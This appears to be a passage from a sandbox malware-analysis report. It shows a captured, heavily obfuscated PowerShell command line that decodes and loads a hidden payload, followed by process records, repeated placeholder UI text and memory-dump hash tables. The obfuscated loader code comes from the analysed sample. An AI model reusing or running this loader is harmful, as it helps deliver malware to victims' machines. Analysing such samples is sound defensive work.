Tanny sEx,ortarTikampeePaatry,tSyphilotTrullsseVitessenPosturesPoetica) Lentic ') ;Dentagra176 (Rekordjagt 'Mokkasi$K.anategWindchelHftetseo Fag idbPrv tekaReddsmalSkonner: Prci eW Op rtcaPte,ygolRigsbyfkPistolaeIndbildn Demilie Spirit=Kise su$UnkamedgDdspatrlRamexdioFlamberbKra,tanaKatapu lNitroge:PrdikatP Offs.crKraftudeTrommesa Artf.lcUdgivelc E.domoutransprsexostott Taageroselvporm,eminereOrdlistdGrundst+G.seous+Unschol%,reyfly$Erudit,VTekstbeiKileskrrStopklogMirdscuiBlufrdinI,dhsteaBankerolSerenesl Exc,mmyEpicond.He.skabcLigasedoSnogehau machinn Deprivt Gabrie ') ;$Cargoliner=$Virginally[$Walkene];}Dentagra176 (Rekordjagt ' gascon$Bowlin,gL.ndkralPikketroSi imidb S,stemaBihulerlBedro.v:ragaersGUnpala.eRe,otednFrontoon BoligseBasketkmRdligs.rEm.ergeykildlumsOuttel.t minisyeUdpantntKulstof Opgoere=epil ch flawynuG .remfueAfm,grit Tytteb- BusrejCInoffenoGalinsonBubblelt UdvaeleArvem tnLimfabrtinsipid Br.gtfl$HavkattOTrachymbbeseemslDiphycei nwithgcoagu aaDecnetatPersistiNon.enuoatomiesn CiliassAflyssdrPaasknneVelve ptAnnoncetDispatee,ykelbunTrykmaasBjer ni ');Dentagra176 (Rekordjagt 'Chanc,a$Cytoplag Scu.lel Arianio coadapbViaduktaRem mbelUltra o:SendebuSFlersidhHeirleseImposanl Hoved l AntelapCoordinoUnprodut Triole Orbb.gr=Th,esub Stann,r[Um eledSfo drveyMinglinsYau snvtRe eptpeObservemAntipro. postaCSpildevoRafflesnGummyinvSyntakseRecleanrT xifyitFortrol]Dagsbef: Mia,ss:Li ieteFmissilfrGoddampoRm rsskmBinde,tBHandelsaSliderssPr,tosueSjalern6Fragmen4S.ovskaSmaltf.btFalklanrUudholdiTostaven Poonacg.rstatn(Beskytt$ BruserG Hnder.ePennysinEluat.dnBoblekae Fornemm Baandsr Forms yFodsveds riticatGaffelte feudaltUdludei)Unjusti ');Dentagra176 (Rekordjagt 'hommos,$Banefulg PerconlNonbrutoTilbagebPatr nia WaspnelAcaulou:HaandgrS ,lokbecMarengsrWeb tedaSlightewforlag.l Bvelsee revendrSto,tilsolivene Superma=Cor cob Viruci[ ObteneSCarmi iy IaomalsForcipatDeck.nge HydropmF.ldblo.SalvninTEsmarale Eph dsxTran,ort Kolleg. UdbudsEAnalysenve stancGainsaioCyborgsdTransfoiCounternMicrophg Smi hc]Vital t:P,ospho: .abellA PhaseaSMisfaitC ArbejdIFilipsgIG yceri.UnfavouGTroubleeMoto istsatir sS PolymetJulef,srLiniestiSy.sttynRataplagTil,rop(Sandkas$ Acce eSSudsmenh CymbideHirsti lPedagoglRhe.usnpJ risdiokundeaftTanekah) Vaagne ');Dentagra176 (Rekordjagt 'plancie$DynamitgThisllplPhascoloLunulaebUnder laClearehlb kldni:FllenesSAfskrkktAkutfunaNedska,tInterplicanop.cs s ndort,akshisi LgnernkPolemarpSensortrForsumpoAarligegDeckelsrDruideraLyknsknmGteskab2Spunkle6doerene=.yvinsa$TanzaniSCrzettec A.abolrBalanopaMisusedwUfordellForhippeDivisi rR,condis Paa ag.Udsendis HematouGaardrybColliersTraffictUvsentlr UrningiCi,ratenAshiestg Sumlog(Monstrs2Fourche9Deu,obr9 Phrase6Advoka,0Klukkes9 Uncial,D,ddelp3Dorritu0Ra.ioli1Recap t5 Filmsp6Ac tylb) Hjrnes ');Dentagra176 $Statistikprogram26;"
                                Imagebase:0x7ff6cb6b0000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true
                                Show Windows behavior

                                File Activities

                                Show Windows behavior

                                Section Activities

                                Show Windows behavior

                                Registry Activities

                                Powershell Activities

                                Show Windows behavior

                                Mutex Activities

                                Show Windows behavior

                                Process Activities

                                Show Windows behavior

                                Thread Activities

                                Show Windows behavior

                                Memory Activities

                                Show Windows behavior

                                System Activities

                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                Show Windows behavior

                                Windows UI Activities

                                Process Token Activities

                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                General

                                Target ID:3
                                Start time:07:26:07
                                Start date:15/04/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6ee680000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true
                                Show Windows behavior

                                File Activities

                                Show Windows behavior

                                Section Activities

                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                Show Windows behavior

                                Mutex Activities

                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                Show Windows behavior

                                Thread Activities

                                Show Windows behavior

                                Memory Activities

                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                Show Windows behavior

                                Windows UI Activities

                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                General

                                Target ID:4
                                Start time:07:26:09
                                Start date:15/04/2024
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Irreplaceableness.Suc && echo $"
                                Imagebase:0x7ff7ec1d0000
                                File size:289'792 bytes
                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true
                                Show Windows behavior

                                File Activities

                                Show Windows behavior

                                Section Activities

                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                Disassembly

                                Executed Functions

                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1575553037.00007FFB4B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ffb4b370000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: @NK$@NK$@NK$@NK$@NK
                                • API String ID: 0-233114815
                                • Opcode ID: 948daf89df93da24e6d896ee80b1bb8a6d8b9034aef427e977e0b23da0ac47b4
                                • Instruction ID: f8f9f50dc6002429dce0abcb2bf86f97012ba8c22c4f2def0d5b25e5892ad3b8
                                • Opcode Fuzzy Hash: 948daf89df93da24e6d896ee80b1bb8a6d8b9034aef427e977e0b23da0ac47b4
                                • Instruction Fuzzy Hash: 14D167A290EACA9FE796AF79C8555B57FE0FF06210B1880FED58CC71A3D9189C05C391
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1575553037.00007FFB4B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ffb4b370000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: P,OK
                                • API String ID: 0-1307682024
                                • Opcode ID: 6e8c4d6d4b67a10b5f66d2546725f3de0d083f7db6b534d896599b18216886e8
                                • Instruction ID: 7897da14eb7ef2caff187de42426b6e050ba40f204e94a59e87f37114d64f285
                                • Opcode Fuzzy Hash: 6e8c4d6d4b67a10b5f66d2546725f3de0d083f7db6b534d896599b18216886e8
                                • Instruction Fuzzy Hash: 7A51C19281E7C52FE3979B784C695A53FA5DF53250B1A81FBE1C8CB0E3D808190A8362
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000002.00000002.1575553037.00007FFB4B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ffb4b370000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2fdc71bb7de7f8614aaf7a566c1eb0ab7be05e53efbd8b9b6d72e3d8a5f76806
                                • Instruction ID: 67f758db694318416cba1436cbfac724df7c71730207371e7eb42434c4642a30
                                • Opcode Fuzzy Hash: 2fdc71bb7de7f8614aaf7a566c1eb0ab7be05e53efbd8b9b6d72e3d8a5f76806
                                • Instruction Fuzzy Hash: 74E155B290DA8A0FF795EF7CC8651B87BF1EF55250B1881FAD18DC71E3DA18A8058341
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000002.00000002.1575553037.00007FFB4B370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B370000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ffb4b370000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f8b92d64764ace196ad9f572891eef56c05645617a879dc91656706a9f8088a5
                                • Instruction ID: e525ef6bf502c5f0080f28457ef7759376d72ac739dca03af693cd3694da508a
                                • Opcode Fuzzy Hash: f8b92d64764ace196ad9f572891eef56c05645617a879dc91656706a9f8088a5
                                • Instruction Fuzzy Hash: E95129A290EACA0FF392EE7DC9601786AE1FF55250B5881F9D28CC71E3DD18BC148341
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000002.00000002.1575141265.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ffb4b2a0000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                • Instruction ID: 69fd97c9042be542dbe079cffc1bcda63ff7c484daaeb389d3d0ef6b8bcd226c
                                • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                • Instruction Fuzzy Hash: 6001677111CB0D8FD744EF0CE451AA6B7E0FB99364F10056DE58AC3661DA36E882CB45
                                Uniqueness

                                Uniqueness Score: -1.00%